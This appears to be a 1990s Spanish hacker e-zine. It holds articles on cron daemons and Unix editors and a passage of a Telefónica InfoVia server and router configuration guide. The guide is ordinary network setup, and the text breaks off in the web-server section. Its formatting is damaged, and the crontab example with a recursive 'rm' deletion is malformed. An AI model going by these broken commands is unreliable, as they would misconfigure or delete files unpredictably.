Hoy en dia, ITS aun es reverenciado entre hackers ancestrales de la Costa Este de Estados Unidos. En terminos precisos, un dragon es un daemon que no se invoca explicitamente pero esta ahi, esperando en el plano secundario para ejecutar un trabajo. El daemon por ejemplo, podria considerarse un dragon. *---------------------------------------------------------------------------* ~~~~~~~~~~~~~~~~ El demonio Cron ~~~~~~~~~~~~~~~~ Cron es un demonio de sistema que ejecuta ordenes en instantes especificos. La informacion de ordenes y de planificacion estan mantenidas en el directorio: /var/spool/cron/crontabs en SVR4, o en /usr/spool/cron/crontabs en los sistemas anteriores a SVR4. Cada usuario que esta titulado para planificar directamente ordenes con cron tiene un archivo crontab. cron despierta periodicamente (generalmente una vez cada minuto) y ejecuta los trabajos que estan planificados para ese minuto. Las entradas en un archivo crontab tienen seis campos: El primer campo es el minuto en que la orden va a ejecutarse. El segundo campo es la hora. El tercero, el dia del mes. El cuarto, el mes del año. el quinto, el dia de la semana. y el sexto, la cadena de orden a ejecutar. Los asteriscos actuan como comodines. En el ejemplo crontab se ejecuta el programa con nombre de camino /var/cron/log y se envia por correo a "root" todos los dias a las 8 P.M. El programa /home/john/bin/backup se ejecuta todos los dias a las 2:30 A.M. # # # MIN HOUR DCM MOY DOW COMMAND # # (0-59) (0-23) (1-31) (1-12) (0-6) (Note: 0=Sun) # ------ ------- ------- ------- ------ -------------- # 0 18 * * * /var/cron/log mail root 30 2 * * * /home/john/bin/backup El archivo/etc/cron.d/cron.allow contiene la lista de todos los usuarios que tienen permitido realizar entradas en la crontab. Si se es administrador del sistema, o si este es su propio sistema, se tendra capacidad para modificar los archivos crontab. Si no se tiene permitido modificar un archivo crontab, se puede usar la orden at para planificar los trabajos. ~~~~~~~~~~~~~~~~ La orden crontab ~~~~~~~~~~~~~~~~ Para añadir algo al archivo crontab, se puede usar la orden crontab. Por ejemplo, puede planificarse la supresion de archivos antiguos en la papelera con una entrada como esta: 0 1 0 cd/home/john/wastebasket; find . -atime+7 -exec /bin/rm-r { } 2> /dev/null; Traduccion : cada domingo a la 1 A.M., ir al directorio wastebasket de john y suprimir todos los archivos que tengan una antiguedad de mas de siete dias. Si se coloca esta linea en un archivo de nombre viejos y se ejecuta la orden: $crontab viejos la linea se colocara en el archivo crontab. Si se usa crontab sin especificar un archivo, la entrada estandar sera la que se coloque en el archivo crontab. La orden: $ crontab CTRL - D borra los contenidos de crontab, es decir, reemplaza los contenidos con nada :). En resumen los daemons son programas residentes en memoria, ademas nadie es el dueño y pueden ser lanzados por el sistema o por un usuarios permitidos. John Jairo</td><TD width=40 nowrap><BR></TD></table> ~~~~~~~~~~~~~~~~~~~~~ Cual editor debo usar ~~~~~~~~~~~~~~~~~~~~~ Si eres usuario de Unix, tienes que aprender a usar un editor (es una obligacion). Las tres opciones principales son vi, emacs y pico. Los primeros son programas llenos de caracteristicas o comandos, muy poderosos, cuyo aprendizaje exige tiempo. pico es un programa sencillo y mucho menos poderoso que se puede aprender con rapidez; viene con el programa de correo pine. Aunque no use pine para leer y enviar correo, puede usar pico como editor en el trabajo cotidiano. Cual editor debo usar? Es aconsejable que use vi o emacs (la decision es suya), y deje que pico sea usado por "usuarios comunes". Pico se diseño para ser sencillo, tanto que puede usarlo de inmediato con poco entrenamiento o ayuda. Por desgracia, dado que es muy sencillo, pico es tan poco creativo, es frustrante hasta la locura. El espiritu de Unix se inclina por el uso de herramientas poderosas, diseñadas con logica: herramientas que le ayuden a pensar, innovar y hacer el trabajo encomendado con elegancia y con minimo desorden. vi y emacs son programas de este tipo. pico, por su parte, ocasiona mutaciones permanentes en el cerebro. Esto no significa que nadie deba usar pico (y otras herramientas parecidas; por ejemplo, el programa de correo pine). En lo absoluto. Pero si usted es del tipo de personas con la inteligencia suficiente como para aprender Unix, lo mas conveniente es que use vi o emacs. Despues de todo, son muchas las personas comunes que al usar pico, pueden llevar vidas utiles y productivas (simples usuarios). Si preguntara a expertos que usan Unix cual editor emplean (pues todo usuario con experiencia en Unix usa algun editor), descubrira que las preferencias se dividen entre vi y emacs. El vi, es un editor disponible en todo sistema Unix y que funciona muy bien. Ademas, es una herramienta estandar. No ha cambiado en años . emacs tambien es adecuado, pero no siempre esta disponible. Es recomendable que primero aprenda a usar vi, a menos que tenga una razon poderosa para no hacerlo. Siempre existe la posibilidad de aprender emacs en el futuro. Si esta aprendiendo vi y se siente temporalmente abatido, descansa, tomate una pausa e intente trabajar con emacs. Te parecera tan complejo e imposible que, con seguridad, sentiras deseos de volver a vi. John Jairo</td><TD width=40 nowrap><BR></TD></table> ***Esto es todo por la primera edicon esperamos todas sus dudas o sugerencias de temas que quizieran que se trataran en estos articulos, hasta la proxima... Mr. AZTECh -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Guia de instalacion de CPI's - Unamed Person ]───────────────────────────── --== GUIA DE INSTALACION DE CENTROS PROVEEDORES DE INFORMACION ==-- ___...---=== Recopilado en la compañia de Telefonos ===---...___ Author: Unamed Person Date: 4/09/98 DISCLAIMER: Este texto se expone UNICAMENTE para fines educativos y/o de investigacion. El autor no se hace responsable de los posibles daños que se pudiera producir la incorrecta utilizacion del texto. Other: Todo lo aqui comentado esta pensado para configuraciones minimas, se recomineda utilizar las herramientas mas potentes existentes en el momento de llevar a cabo las configuraciones. Indice de Contenidos...........................................i 1 INTRODUCCION 1.1 OBJETIVO 1.2 CONCEPTOS RELACIONADOS 2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION 2.1 CPI ACCESIBLE SOLO DESDE Internet 2.2 CPI ACCESIBLE SOLO DESDE InfoVia 2.3 CPI ACCESIBLE DESDE InfoVia E Internet 2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia 3 ARQUITECTURA DE UN CPI 4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC 4.1 CONFIGURACION DE LA MAQUINA UNIX 4.1.1 Configuracion de direcciones, interfaces y rutas 4.1.1.1 Fichero /etc/hosts 4.1.1.2 Fichero /etc/nodename 4.1.1.3 Fichero /etc/hostname.le0 4.1.1.4 Fichero /etc/hostname.le0:1 4.1.1.5 Fichero /etc/netmasks 4.1.1.6 Fichero /etc/defaultrouter 4.1.1.7 Fichero /etc/rc2.d/S72inetsvc 4.1.2 Configuracion del servidor de web 4.1.2.1 Fichero httpd.conf 4.1.2.2 Fichero access.conf 4.1.2.3 Fichero srm.conf 4.1.3 Configuracion del servidor de RADIUS 4.1.3.1 Fichero cfg_local_INFOVIA 4.1.3.2 Fichero clientes_INFOVIA 4.1.3.3 Fichero usuarios_INFOVIA 4.1.4 Configuracion del servidor DNS 4.1.4.1 Fichero /etc/named.boot 4.1.4.2 Fichero /var/named/db.cpi.telefonica.es 4.1.4.3 Fichero /var/named/db.194.179.42 4.1.4.4 Fichero /var/named/db.10 4.1.4.5 Fichero /var/named/db.127.0.0 4.2 CONFIGURACION DEL ``ROUTER'' 4.3 CONCLUSIONES 5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO LINUX 5.1 CONFIGURACION DE LA MAQUINA LINUX 5.1.1 Instalacion de las dos tarjetas Ethernet 5.1.2 Configuracion de direcciones, interfaces y rutas 5.1.2.1 Configuracion de la interfaz Internet (eth0) 5.1.2.2 Configuracion de la Interfaz InfoVia (eth1) 5.1.3 Configuracion del servidor de web 5.1.4 Configuracion del servidor de RADIUS 5.1.5 Configuracion del servidor DNS 5.2 CONFIGURACION DEL ``ROUTER'' 5.3 CONCLUSIONES 6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL UNIX 6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX 6.1.1 Configuracion de direcciones, interfaces y rutas 6.1.1.1 Fichero /etc/hosts 6.1.1.2 Fichero /etc/rc.config 6.1.1.3 Nombre de la maquina 6.1.2 Configuracion del servidor de web 6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf 6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf 6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf 6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf 6.1.3 Configuracion del servidor RADIUS 6.1.4 Configuracion del servidor DNS 6.2 CONFIGURACION DEL ``ROUTER'' 6.3 CONCLUSIONES 7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI 8 PROCESO ADMINISTRATIVO Glosario 1 INTRODUCCION ============ En el presente documento se propone una solucion unica para Centros Proveedores de Informacion (CPI). Esta solucion es valida para CPIs conectados a Internet o a InfoVia, e incluso para CPIs conectados tanto a InfoVia como a Internet. Se ha buscado una solucion que sea valida para cualquier tipo de CPI. Esta solucion se basa en una unica arquitectura, la cual, se caracteriza por el reducido equipamiento que necesita. De este modo se simplifica y abarata la construccion de un CPI. 1.1 OBJETIVO -------- En este documento se explica una solucion global para la construccion de centros proveedores de informacion. Esta solucion es valida para cualquier tipo de CPI: los conectados solo a InfoVia o a Internet, asi como los conectados tanto a InfoVia como a Internet. La estructura de este documento es la siguiente: . Capitulo 1: Introduccion. Presenta una introduccion al resto del documento. Tambien incluye una explicacion de los conceptos relacionados con los CPIs. Por ultimo se adjunta una relacion de la bibliografia utilizada. . Capitulo 2: Descripcion de los centros proveedores de informacion. En este capitulo se presentan los distintos tipos de centros proveedores de informacion, cuya integracion en una unica arquitectura es el objetivo del presente documento. . Capitulo 3: Arquitectura de un CPI. Se explica en detalle la arquitectura propuesta para un CPI. . Capitulo 4: Ejemplo de configuracion de un CPI sobre SUN SPARC. Se presenta un ejemplo de como habria que configurar un CPI de acuerdo con la arquitectura presentada en el capitulo anterior. Para el ejemplo se ha elegido un CPI que sea accesible tanto desde InfoVia como desde Internet, con pasarela a Internet desde InfoVia. En este ejemplo se emplea una maquina UNIX de SUN Microsystems y un servidor web NCSA. . Capitulo 5: Ejemplo de configuracion de un CPI sobre PC con Linux. En este capitulo se explica como habria que configurar un CPI de acuerdo con la arquitectura presentada en el capitulo tres. Para el ejemplo se ha elegido un CPI accesible tanto desde InfoVia como desde Internet, con pasarela a Internet desde InfoVia. En este ejemplo se emplea un PC con sistema operativo Linux, y un servidor web NCSA. . Capitulo 6: Ejemplo de configuracion de un CPI sobre una maquina con sistema operativo DIGITAL UNIX. Se desarrolla un ejemplo de como configurar un CPI segun la arquitectura presentada en el capitulo tres. Para el ejemplo se ha tomado un CPI accesible tanto desde InfoVia como desde Internet, con pasarela a Internet desde InfoVia. En el ejemplo se emplea una maquina con el sistema operativo Digital Unix 3.2C, y un servidor web NCSA. . Capitulo 7: Informacion adicional para la instalacion de un CPI. Se informa que el codigo de un servidor RADIUS, compilado para diferentes plataformas, esta disponible en un servidor ftp anonimo. . Capitulo 8: Proceso administrativo. Se detallan los aspectos administrativos que un proveedor de informacion debera de realizar para establecer un CPI. 1.2 CONCEPTOS RELACIONADOS ---------------------- . InfoVia es una red que permite el acceso a los usuarios a centros proveedores de informacion bien a traves de la red telefonica basica (RTB), de la RDSI o GSM. InfoVia multiplexa y demultiplexa el trafico procedente de los usuarios a los diferentes centros proveedorees de informacion. Los CPIs se conectaran a los Centros de Servicio InfoVia (CSIV) a traves de enlaces frame relay. . Centro Proveedor de Informacion (CPI), expresion con la que se designa al conjunto de equipos que proporcionan informacion al usuario. La informacion de un CPI podra ser accesible desde InfoVia o desde Internet. Tambien puede ser accesible desde InfoVia e Internet. Existe una ultima opcion de CPI que es la de ``pasarela'' a Internet: se trata de un centro accesible desde InfoVia que permite a los usuarios autorizados el acceso a Internet. . Centro de Servicio InfoVia (CSIV), con este nombre se denomina al conjunto de equipos que ofrecen la funcionalidad InfoVia al usuario de una zona geografica concreta. Es decir, el servicio ofrecido por InfoVia se encuentra distribuido en varios centros repartidos por el territorio nacional en funcion de la demanda y utilizacion del servicio. En general se usara el termino InfoVia indistintamente para referirse al servicio prestado como a los equipos (red) sobre los que se presta dicho servicio. . Centro de Gestion de InfoVia (CGIV), es el conjunto de equipos que permiten a Telefonica realizar la gestion de los distintos centros que soportan la prestacion del servicio. En el documento se usara el termino Sistema de Gestion para referenciarlo. . El usuario llamante es la persona que realiza la llamada a un CPI a traves de InfoVia. Para ello debera poseer un PC con la torre de comunicaciones TCP/IP instalada, y un modem (acceso a traves de la RTB) o un adaptador de terminal (acceso a traves de la RDSI). . El proveedor del servicio o cliente, es la persona o entidad que desea suministrar informacion a traves de InfoVia, de Internet, o a traves de ambas redes. . Frame relay, es el protocolo utilizado entre dispositivos de usuario y equipos de red (por ejemplo nodos de conmutacion). Es un protocolo mas eficiente que el de X.25. Este servicio se provee por tecnicas de Circuitos Virtuales Permanentes (PVC). . Servidor RADIUS, es un software que puede correr en una maquina de las instalaciones del proveedor de informacion. Su mision es realizar, en colaboracion con InfoVia, la autentificacion de los abonados suscritos al proveedor de informacion. . IANA, la autoridad que asigna los direcciones en Internet. . RFCs, son los documentos oficiales de Internet. . CIR, es un parametro de contratacion de una conexion frame relay, para cada uno de los circuitos virtuales permanentes contratados por interfaz. Este parametro de contratacion determina el numero minimo de bits por segundo que la red va a ser capaz de conmutar para ese circuito virtual permanente. 2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION ===================================================== Existen distintos tipos de centros proveedores de informacion. En este capitulo se describe la arquitectura y los servicios que puede soportar cada uno de ellos. Los tipos de CPI son los siguientes: . CPI accesible solo desde Internet. . CPI accesible solo desde InfoVia. . CPI accesible desde InfoVia e Internet. . CPI para el acceso a Internet desde InfoVia. Estas configuraciones son optimizables. En el Capitulo 3 se indica como hacerlo en un contexto UNIX, y en el Capitulo 4 y en el Capitulo 5 se proponen ejemplos de CPIs configurados de acuerdo a la solucion presesentada en el Capitulo 3. En los siguientes apartados de este capitulo se describe en detalle cada uno de estos tipos de CPI. 2.1 CPI ACCESIBLE SOLO DESDE Internet --------------------------------- Este CPI solo estara conectado a la red Internet. Los servicios que ofrecera a los usuarios que accedan seran todos los que puede ofrecer Internet como son entre otros: . Servidor de web. . Servidor de mail. . Servidor de news. Este tipo de CPI que solo es accesible desde Internet no forma parte de InfoVia. Todas las direcciones de los equipos que integran el CPI han de estar registradas en Internet. 2.2 CPI ACCESIBLE SOLO DESDE InfoVia -------------------------------- Este CPI solo estara conectado a la red InfoVia. Los servicios que ofrecera a los usuarios que accedan seran todos los que puede ofrecer Internet, dado que la red InfoVia emplea tambien protocolos IP y las direcciones reservadas por Internet para redes privadas (RFC 1918). Entre estos servicios esta: . Servidor de web. . Servidor de mail. . Servidor de news. En este tipo de centros, las direcciones de los equipos que lo integran las proporciona InfoVia. 2.3 CPI ACCESIBLE DESDE InfoVia E Internet -------------------------------------- Este CPI esta conectado a las dos redes, a InfoVia y a Internet. Una caracteristica fundamental de este tipo de centros proveedores de informacion es que aun cuando son accesibles desde las dos redes, no se mezclan los accesos. Es decir, cuando un usuario acceda desde Internet, toda la informacion solicitada se le enviara a traves de Internet. Si el acceso del usuario es por InfoVia, toda la informacion la recibira a traves de InfoVia. Esto ha de ser asi puesto que en InfoVia el direccionamiento empleado es el reservado a redes privadas. Por tanto, cualquier CPI que se instale de este tipo debera respetar esta condicion. Los servicios que ofrecera a los usuarios que accedan por cada una de ellas seran todos los que puede ofrecer Internet. Entre estos servicios estan: . Servidor de web. . Servidor de mail. . Servidor de news. 2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia ------------------------------------------- Este tipo de CPI esta conectado a las dos redes, a InfoVia y a Internet. La peculiaridad de este tipo de centros es que permite a un usuario procedente de InfoVia el acceso a Internet. Para ello, en una de las maquinas del centro se ha de instalar un servidor RADIUS cuya mision es la de asignar direcciones de Internet a los usuarios de InfoVia que se lo soliciten. Para que un CPI pueda actuar como ``pasarela'' de InfoVia a Internet, ha de disponer de un rango (``pool'') de direcciones validas de Internet. El usuario que vaya a acceder a Internet desde InfoVia lo ha de hacer con una de las direcciones de ese rango, es decir, con direcciones de Internet. Esto es asi dado que con las direcciones empleadas por InfoVia no se puede acceder a Internet (son direcciones reservadas para redes privadas). Cuando un usuario quiera acceder a Internet a traves de este CPI, el cliente RADIUS instalado en el CSIV al que ha accedido el usuario, se conectara al servidor RADIUS del CPI. El cliente solicitara al servidor una de las direcciones IP que administra este servidor RADIUS. Para ello el cliente ha de indicar al servidor el nombre (``login'') y la clave (``password'') del usuario llamante. Si el nombre y la clave son validos, y al CPI le quedan direcciones de Internet disponibles, el servidor enviara al cliente RADIUS del CSIV la direccion IP con la que el usuario puede acceder a Internet. La comunicacion entre el cliente RADIUS del CSIV y el servidor RADIUS del CPI se hace siempre por medio de direcciones de InfoVia. Este tipo de centros, ademas puede dar servicios tanto a los usuarios que acceden desde InfoVia como a los que acceden desde Internet. Es decir, este centro ademas de servir a los usuarios llamantes como ``pasarela'' desde InfoVia a Internet, tambien puede servir como un CPI del tipo descrito en el apartado anterior, el apartado 2.3. En la Figura 2-4 se muestra un diagrama de un CPI con acceso a Internet desde InfoVia. 3 ARQUITECTURA DE UN CPI ====================== En este capitulo se presenta una arquitectura unica para cualquier tipo de CPI. Se trata de una solucion valida tanto para CPIs accesibles solo desde InfoVia o Internet, asi como para un CPI accesible desde las dos redes o con pasarela a Internet desde InfoVia. Las razones por las cuales se ha buscado una arquitectura unica para cualquier tipo de CPI son dos: 1. Facilitar el montaje a todas las entidades que quieran instalar un CPI, cualquiera que sea el tipo de CPI que vaya a instalar. 2. Dar una solucion con el menor numero posible de equipos, lo que implica una reduccion en los costes de instalacion del CPI. Para proponer una unica arquitectura en los CPIs, cualquiera que sea su tipo, se ha tenido en cuenta lo siguiente: . Por medio del protocolo frame relay un mismo enlace admite multiples circuitos virtuales permanentes (PVC), cada uno de los cuales puede dar soporte a una conexion distinta. De este modo un unico enlace frame relay con dos PVCs, podria conectar a un CPI con Internet y con un Centro de Servicio (CSIV) de InfoVia. El primer PVC soportaria la conexion con Internet. Por medio del segundo PVC, el CPI se conectaria con el CSIV de InfoVia. . Algunas maquinas UNIX admiten multiples direcciones (y tambien multiples mascaras) en cada una de sus interfaces. Esto hace posible que una unica maquina UNIX, con una unica interfaz, pueda comportarse como si se tratase de dos maquinas diferentes, cada una con su direccion y mascara propia. Es decir, se puede hacer que una misma maquina actue como si se tratase de dos maquinas, cada una de las cuales forma parte de una red diferente. Esta caracteristica que tienen algunas maquinas UNIX evita el tener que adquirir e instalar una tarjeta con multiples interfaces para cada maquina que se quiere que sea accesible desde redes distintas (InfoVia e Internet), ya que esto mismo se puede conseguir via software. . Un ``router'' admite en cada una de sus interfaces (tanto en las interfaces ethernet como en las interfaces serie) multiples direcciones y mascaras. Esto permite estructurar cada una de las interfaces de un ``router'' en subinterfaces. Esta peculiaridad permite a partir de una unica interfaz serie, disponer en realidad de multiples interfaces. Para ello basta configurar multiples subinterfaces en esa unica interfaz. . Los servidores de web NCSA o NetScape instalados en una maquina UNIX con multiples direcciones IP, pueden proporcionar diferentes paginas HTML en funcion de la direccion IP. Es decir, un servidor NCSA, o NetScape, instalado en una maquina UNIX con varias direcciones IP, se puede configurar de forma que se comporte como varios servidores de web diferentes, cada uno con sus propios contenidos. Cada uno de estos ``servidores virtuales'' se corresponde con una de las direcciones IP asignadas a la maquina. . Un enlace frame relay. El numero de circuitos virtuales permanentes necesarios sera: * CPI accesible solo desde Internet: 1 PVC. * CPI accesible solo desde InfoVia: 1 PVC por cada CSIV de InfoVia al que se conecte el CPI. * CPI accesible desde InfoVia e Internet: 1 PVC para Internet, y 1 PVC por cada uno de los CSIV de InfoVia al que se conecte el CPI. * CPI con acceso a Internet desde InfoVia: 1 PVC para Internet y 1 PVC por cada uno de los CSIV de InfoVia al que se conecte el CPI. . Un unico ``router'' con una interfaz ethernet y una interfaz serie. Por medio de la interfaz ethernet, el ``router'' se conecta a la red de area local (RAL) del CPI. El enlace frame relay se lleva a la interfaz serie. * CPI accesible solo desde Internet: 1 PVC. Interfaz ethernet: 1 direccion y mascara IP dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. Interfaz serie: 1 subinterfaz al que se ha de asignar el unico PVC del enlace frame relay. * CPI accesible solo desde InfoVia: 1 PVC como minimo. Interfaz ethernet: 1 direccion y mascara IP dentro del rango de direcciones utilizado en InfoVia. Interfaz serie: tantas subinterfaces como el numero de CSIVs de InfoVia a los que esta conectado el CPI. A cada subinterfaz se le asigna un PVC que conecta con un determinado CSIV. * CPI accesible desde InfoVia e Internet: 2 PVCs como minimo. Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP. Una dentro del rango de direcciones empleado en InfoVia, y la otra dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se le asigna el PVC que conecta con Internet. A las restantes subinterfaces se les asignan los restantes PVCs del enlace frame relay, ya que son los PVCs que permiten la conexion del CPI con los CSIVs de InfoVia. * CPI con acceso a Internet desde InfoVia: 2 PVCs como minimo. Interfaz ethernet: 2 direcciones y las correspondientes mascaras IP. Una dentro del rango de direcciones empleado en InfoVia, y la otra dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. Interfaz serie: 2 o mas subinterfaces. A una de las subinterfaces se le asigna el PVC que conecta con Internet. A las restantes subinterfaces se les asignan los restantes PVCs del enlace frame relay, ya que son los PVCs que permiten la conexion del CPI con los CSIVs de InfoVia. . Una maquina UNIX, siempre que la capacidad (velocidad, disco duro, ...) sea suficiente como para soportar todos los servicios de informacion que se pretende que de el CPI. El numero de interfaces a configurar en la maquina es el siguiente: * CPI accesible solo desde Internet: 1 direccion y mascara IP, dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. * CPI accesible solo desde InfoVia: 1 direccion y mascara IP, dentro del rango de direcciones empleado en InfoVia. * CPI accesible desde InfoVia e Internet: 2 direcciones y mascaras IP. Una dentro del rango de direcciones empleado en InfoVia, y la otra dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. * CPI con acceso a Internet desde InfoVia: 2 direcciones y mascaras IP. Una dentro del rango de direcciones empleado en InfoVia, y la otra dentro del rango de direcciones validas de Internet asignado por el IANA al proveedor. 4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC ================================================== La mejor manera de explicar como se ha de instalar un CPI es ilustrarlo con un ejemplo. En este capitulo se presenta un ejemplo de un CPI. Las caracteristicas de este CPI son las que se enumeran en la siguiente lista: . Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI esta conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de Barcelona. . Servicios ofrecidos por el CPI: * Servidor de web para InfoVia. * Servidor de web para Internet. * Servicio de pasarela a Internet. . Direcciones IP del CPI: * Direcciones en InfoVia: El centro tiene asignado un rango de 256 direcciones en InfoVia. Este rango se emplea para dar direcciones de InfoVia a las maquinas del centro. Direcciones: Para las maquinas del centro: 10.128.102.0 a 10.128.102.255. * Direcciones en Internet (asignadas por el IANA al proveedor): El centro tiene asignada una clase C de direcciones en Internet: Direcciones: 194.179.42.0 a 194.179.42.255 . El servidor de RADIUS del CSIV es el que se encarga de asignar direcciones de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados a ese CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran los ``pools'' de direcciones de InfoVia. . Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene definido un ``pool'' (rango) de direcciones que puede asignar dinamicamente a los usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos, uno para los usuarios llamantes al CSIV de Madrid y otro para los usuarios llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes direcciones: * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Madrid. De 194.179.42.129 a 194.179.42.158, es decir un rango de 30 direcc. * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un rango de 30 direcciones. Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un usuario quiere acceder a Internet a traves de este CPI, el cliente de RADIUS del CSIV correspondiente consultara al servidor RADIUS del CPI elegido por el usuario llamante. El equipamiento del CPI es el siguiente: . Una maquina Sun SPARC-20, equipada con una unica interfaz ethernet. Sistema operativo SunOS 5.3, con Open Windows 3.4 y Netra Internet Server 2.0. . Un ``router'' CISCO 2500 equipado con una interfaz ethernet y dos interfaces serie. Solo se van a emplear la interfaz ethernet y una de las interfaces serie. . Un enlace frame relay a 48 Kbit/s con tres PVCs, el 17 (para Internet), el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona). Cada PVC garantiza una velocidad minima de 16 Kbit/s. . Un ``hub'' con 8 tomas. Por tanto, la RAL del CPI se ha construido con el ``hub'' y cables de pares trenzados (UTP). En los siguientes apartados se detalla la configuracion de cada una de las maquinas que integran el CPI del ejemplo. 4.1 CONFIGURACION DE LA MAQUINA UNIX. -------------------------------- En la maquina UNIX del CPI se han instalado los siguientes servidores: . Un servidor de web NCSA. Se configura de modo que se comporte como dos servidores de web independientes. Uno de ellos dara servicio a los usuarios que accedan por Internet, mientras que el segundo da servicio a los que accedan por InfoVia. . Un servidor de RADIUS cuya mision es la de asignar dinamicamente las direcciones del ``pool'' de direcciones de Internet manejado por el CPI. . Un servidor DNS. En los siguientes puntos se detalla la configuracion de la maquina asi como de los diferentes servidores instalados en ella. 4.1.1 Configuracion de direcciones, interfaces y rutas. ------------------------------------------------ La maquina solo dispone de una interfaz, la le0, a la que se le asignan dos direcciones IP. Estas direcciones son: . Direccion IP de Internet: 194.179.42.2 . Direccion IP de InfoVia: 10.128.102.2 En el ejemplo se ha supuesto que el proveedor divide la clase C (256 dir.) que se le ha concedido en subredes de 64 maquinas cada una. Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se asignan direcciones de la clase A 10.0.0.0 reservada por Internet para redes privadas. Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a 10.127.255.255 para los usuarios, mientras que las direcciones 10.128.0.0 a 10.255.255.255 para los CPIs. De acuerdo con esto, las mascaras correspondientes seran: . Mascara para la direccion IP de Internet: 255.255.255.192 . Mascara para la direccion IP de InfoVia: 255.128.0.0 En lo que a rutas se refiere, ha de habilitarse una ruta que permita encaminar el trafico de los usuarios de InfoVia y el trafico con el CSIV. En esta ruta, todo el trafico de las direcciones que van de la 10.0.0.0 a la 10.127.255.255, ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y ademas, permite que los paquetes salientes de la maquina tengan como direccion origen la de InfoVia. Los ficheros necesarios para configurar las direcciones son: . /etc/hosts . /etc/nodename . /etc/hostname.le0 . /etc/hostname.le0:1 . /etc/netmasks . /etc/defaultrouter . /etc/rc2.d/S72inetsvc El contenido de estos ficheros es el que se indica en los proximos subapartados. 4.1.1.1 Fichero /etc/hosts ------------------ 127.0.0.1 localhost loghost timehost 194.179.42.2 maquina 10.128.102.2 maquina-inf 194.179.42.1 router 10.128.102.1 router-inf 4.1.1.2 Fichero /etc/nodename --------------------- maquina 4.1.1.3 Fichero /etc/hostname.le0 ------------------------- maquina 4.1.1.4 Fichero /etc/hostname.le0:1 --------------------------- maquina-iv 4.1.1.5 Fichero /etc/netmasks --------------------- Por medio de este fichero se definen las mascaras a aplicar en cada una de las interfaces (ya sean hardware o software) de la maquina. 194.179.42.0 255.255.255.192 10.0.0.0 255.128.0.0 4.1.1.6 Fichero /etc/defaultrouter -------------------------- Este fichero indica cual es el ``router'' por defecto de la maquina. Es decir, a que ``router'' se ha de enviar todo el trafico que llegue a la maquina y que esta no sepa por donde encaminar segun las rutas definidas. El contenido del fichero es: router 4.1.1.7 Fichero /etc/rc2.d/S72inetsvc ----------------------------- En este fichero se pueden configurar y activar o desactivar interfaces. Tambien en este fichero se definen rutas. En este fichero ha de incluirse el siguiente comando UNIX, con el objeto de asignar a la interfaz le0 de la maquina una segunda direccion IP, la correspondiente a InfoVia. /usr/sbin/ifconfig le0:1 10.128.102.2 netmask 255.128.0.0 up Esta ultima instruccion no es necesaria si se ha creado el fichero /etc/hostname.le0:1 en el que se le dice a la maquina la direccion de InfoVia, y en el fichero /etc/netmasks se le ha asignado la mascara 255.128.0.0 a la red 10.0.0.0. Para que el CPI pueda encaminar el trafico de los usuarios llamantes a InfoVia y que los paquetes con destino a esos usuarios tengan como direccion origen la de InfoVia, hay que definir en el fichero la siguiente ruta: /usr/sbin/route add net 10.0.0.0 10.128.102.1 1 Para que el CPI pueda encaminar la informacion con destino al cliente RADIUS del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del CSIV al que se conecta el CPI, debe incluirse en el fichero estas rutas: /usr/sbin/route add host 172.16.192.1 10.128.102.1 1 /usr/sbin/route add host 172.16.193.1 10.128.102.1 1 Si en un futuro se añaden mas CSIVs, deberan añadirse mas rutas de ``hosts'' como las anteriores. Lo unico que cambiara es la direccion IP de lo ``hosts'' de los nuevos CSIVs. 4.1.2 Configuracion del servidor de web --------------------------------- Para instalar un servidor de web NCSA, y que se comporte como dos servidores independientes, han de configurarse los siguientes ficheros: . /opt/SUNWweb/sun_httpd/conf/httpd.conf . /opt/SUNWweb/sun_httpd/conf/access.conf . /opt/SUNWweb/sun_httpd/conf/srm.conf La ruta de acceso (``path'') de los tres ficheros anteriores no tiene por que ser esa, ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo que aqui se presenta, se ha instalado el servidor en el directorio 